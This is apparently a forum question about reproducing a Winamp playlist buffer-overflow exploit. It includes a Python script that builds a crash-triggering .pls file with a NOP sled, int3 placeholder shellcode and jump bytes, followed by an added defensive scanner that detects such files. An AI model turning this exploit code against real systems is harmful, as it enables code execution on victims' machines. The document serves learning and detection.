I'm trying to replicate the "egg hunting" exploitation for Winamp.
I started with the POC code provided (I rewrote it in Python):
#!/usr/bin/python
__author__ = 'HSN'
# Build the crash-triggering .pls layout: header, sled, marker block, tail.
start = "[playlist]\r\nFile1=\\\\"
nop = "\x90"*856          # padding up to the saved return address
shellcode = "\xcc"*166    # int3 placeholder so the debugger stops cleanly
jmp = "\x41"*4+"\x83"*8+"\x90"*4
end = "\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n"
evil = start + nop + shellcode + jmp + end
print len(evil)
# Binary mode so "\r\n" is not rewritten as "\r\r\n" on Windows,
# which would shift every offset in the file.
f = open("boom.pls", "wb")
f.write(evil)
f.close()
When using the previous code, the application crashes as expected (EIP is overwritten).
However, I wanted to replicate the fuzzing process (at least to get the EIP offset myself). But whenever I change the content of my buffer (while preserving the total length and taking bad characters into account), the application crashes in a way similar to what happens when SEH is overwritten.
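The crash file above works because the player copies an unbounded File entry into a fixed stack buffer. From the defender's side, the same file is easy to recognise before it is ever opened: a playlist path that is over a thousand bytes long, contains non-printable bytes, and is mostly one repeated byte. The scanner below is an added example, not code from the question or from any player; the 260-byte limit (Windows MAX_PATH), the 64-byte run threshold and the two sample playlists are assumptions constructed for the illustration, with the second sample mirroring the layout of boom.pls.

```python
import re
import sys

# Assumed policy values (not from the original post).
MAX_FILE_ENTRY_LEN = 260          # Windows MAX_PATH; longer paths are suspicious
MIN_RUN_LEN = 64                  # a run of one byte this long looks like padding
PRINTABLE = set(range(0x20, 0x7F))


def scan_pls(data):
    """Return a list of (entry, reason) findings for a raw .pls payload (bytes).

    Only FileN entries are checked: they are the fields a player treats as paths
    and copies around, so they are where a length bug is triggered.
    """
    findings = []
    if not data.startswith(b"[playlist]"):
        findings.append(("header", "missing [playlist] section header"))
    for raw in data.split(b"\r\n"):
        line = raw.rstrip(b"\n")
        if b"=" not in line:
            continue
        key, _, value = line.partition(b"=")
        key = key.strip()
        if not re.fullmatch(rb"File\d+", key):
            continue
        name = key.decode()
        if len(value) > MAX_FILE_ENTRY_LEN:
            findings.append((name, "value length %d exceeds %d"
                             % (len(value), MAX_FILE_ENTRY_LEN)))
        bad = sorted({b for b in value if b not in PRINTABLE})
        if bad:
            findings.append((name, "non-printable bytes present: "
                             + ", ".join("0x%02x" % b for b in bad[:5])))
        # A long run of a single byte is the signature of sled/padding material.
        run = re.search(rb"(.)\1{%d,}" % (MIN_RUN_LEN - 1), value, re.DOTALL)
        if run:
            findings.append((name, "run of %d repeated 0x%02x bytes"
                             % (len(run.group(0)), run.group(1)[0])))
    return findings


# Constructed sample: an ordinary one-track playlist.
BENIGN_PLS = (b"[playlist]\r\nFile1=C:\\Music\\track01.mp3\r\nTitle1=Track 1\r\n"
              b"Length1=213\r\nNumberOfEntries=1\r\nVersion=2\r\n")

# Constructed sample mirroring the layout of the crash file in the question:
# a long sled of one byte, a block of int3 bytes, and a short tail.
CRASH_PLS = (b"[playlist]\r\nFile1=\\\\" + b"\x90" * 856 + b"\xcc" * 166
             + b"\x41" * 4 + b"\x83" * 8 + b"\x90" * 4
             + b"\r\nTitle1=pwnd\r\nLength1=512\r\nNumberOfEntries=1\r\nVersion=2\r\n")


if __name__ == "__main__":
    # Usage: python scan_pls.py playlist.pls   (falls back to the built-in samples)
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            samples = [(sys.argv[1], fh.read())]
    else:
        samples = [("benign", BENIGN_PLS), ("crash", CRASH_PLS)]
    for label, blob in samples:
        print(label, scan_pls(blob) or "clean")
```

A player that applied just the first check, rejecting a File entry longer than the path buffer it copies into, would not crash on this file at all, whether the overwrite lands on the return address or on the SEH chain; the other two checks are what a mail gateway or endpoint scanner can apply without knowing anything about the player's stack layout.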